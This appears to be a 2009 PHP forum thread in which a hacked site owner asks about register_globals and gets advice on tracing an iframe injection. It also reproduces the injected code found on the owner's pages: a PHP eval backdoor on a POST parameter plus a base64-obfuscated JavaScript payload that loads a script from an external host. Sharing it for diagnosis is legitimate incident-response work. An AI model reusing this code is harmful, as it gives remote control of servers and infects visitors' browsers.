Page 1 of 1

Turning Register Globals OFF

Posted: Tue May 12, 2009 4:21 pm
by kendall
hey

is using this statment
;register_globals = Off
turning the register global "off" or disabling it and the default is on?

i'm using PHP < 5

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 4:29 pm
by Christopher

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 4:38 pm
by kendall
arborint wrote:That is commented out.

http://us.php.net/manual/en/ini.core.ph ... er-globals
what does it mean when it is commented out? does it mean that it is commented out and no one and turn it on or off? does it mean then that it defaults to on or off? or that register_globals doesn't exsist?

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 5:00 pm
by Christopher
If it is commented out then that line does nothing, so it will be set to the default.

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 5:06 pm
by kendall
arborint wrote:If it is commented out then that line does nothing, so it will be set to the default.
which is usually "on" doesn't it.....because im using php < 5?

i got hacked with the <iframe src="topworld.cn...... hack

I dont see anything in the logs that suggest how they got in.... so im trying to clear my name

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 5:26 pm
by John Cartwright
kendall wrote:which is usually "on" doesn't it.....because im using php < 5?
http://ca2.php.net/manual/en/ini.core.php#ini.register-globals wrote: As of ยป PHP 4.2.0, this directive defaults to off.

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 6:33 pm
by ldougherty
<iframe injections are commonly performed via compromised FTP information. What you need to do is take the modified date of the injected file and look into the raw logs on the server to determine what happened at that time. Generally if you look through the FTP log you'll see where the file(s) have been updated.

Re: Turning Register Globals OFF

Posted: Wed May 13, 2009 7:16 am
by kaisellgren
If you do not implicitly specify it as on, it should be off unless there is a third-party affecting it (like .htaccess).

That ; character in the beginning of the line is a comment marker and it makes the line a comment so it is "commented out".

I believe your problem has nothing to do with Register Globals.

Re: Turning Register Globals OFF

Posted: Wed May 13, 2009 9:45 am
by kendall
got that from my server logs....can any explain what he is trying to do here?

Re: Turning Register Globals OFF

Posted: Wed May 13, 2009 9:57 am
by kaisellgren
kendall wrote:got that from my server logs....can any explain what he is trying to do here?
Your index.php in news page may be vulnerable to attacks due to lack of proper input filtering.

Re: Turning Register Globals OFF

Posted: Wed May 13, 2009 10:01 am
by kendall

Code: Select all

if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_
lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGF
JOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCB
sYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe
3ZhciBiQzREPSdfNzZhcl8yMGFfM2RfMjJTY3JpcHRfNDVuZ2lu
ZV8yMl8yY2JfM2RfMjJfNTZlcnNpb25fMjhfMjkrXzIyXzJjal8zZF8
yMl8yMl8yY3VfM2RfNmVhdmlfNjdhXzc0b183Ml8yZXVzZV83Mk
FnZW50XzNiaWZfMjgoXzc1XzJlaW5kXzY1eE9mXzI4XzIyV2luX
zIyKV8zZTApXzI2XzI2KHVfMmVpbmRleE9mXzI4XzIyXzRlVF8y
MF8zNl8yMilfM2NfMzBfMjlfMjZfMjYoZG9jdW1lbnRfMmVjb29fNm
JfNjlfNjVfMmVpbmRlXzc4T2ZfMjhfMjJtaWVrXzNkMV8yMilfM2Mw
KV8yNl8yNih0eV83MGVvZl8yOF83YV83MnZ6Xzc0cylfMjFfM2R
0eXBlb2YoXzIyQV8yMilfMjkpXzdiXzdhcnZ6Xzc0c18zZF8yMkFf
MjJfM2Jldl82MWxfMjhfMjJfNjlmKHdfNjluZF82ZndfMmVfMjJfMmJ
hXzJiXzIyKWpfM2RqXzJiXzIyK182MStfMjJfNGRhal82ZnJfMjJfM
mJiK2ErXzIyXzRkaW5vXzcyXzIyXzJiYitfNjErXzIyXzQyXzc1aV8
2Y2RfMjIrYl8yYl8yMmpfM2JfMjJfMjlfM2JkXzZmY3VfNmRlbnRfM
mV3XzcyXzY5dGUoXzIyXzNjc2NyaXB0XzIwc3JfNjNfM2RfMmZf
MmZndW1ibGFyXzJlY25fMmZyc3NfMmZfM2ZfNjlfNjRfM2RfMjIra
itfMjJfM2VfM2NfNWNfMmZzY3JpcHRfM2VfMjIpXzNiXzdkJzt2YX
IgRnVKeD1iQzRELnJlcGxhY2UoL18vZywnJScpO3ZhciB4RnRJS
j11bmVzY2FwZShGdUp4KTtldmFsKHhGdElKKX0pKCk7CiAtLT48
L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
This is what is being left on my index.php pages....both in php and javascript....i am finding a image.php in my images files.

Re: Turning Register Globals OFF

Posted: Sat May 16, 2009 11:22 pm
by John Cartwright
As described before, you are not filtering your input variables correctly, and in not doing so, have allowed the execution of remote code on your server (which in turn manipulated your files). The first step would be to immediatly take your site offline until this has been patched, otherwise there is no way to tell how far you've been comprimised. The second step would be to assure you are only included files within your filesystem, and preferably whitelisted.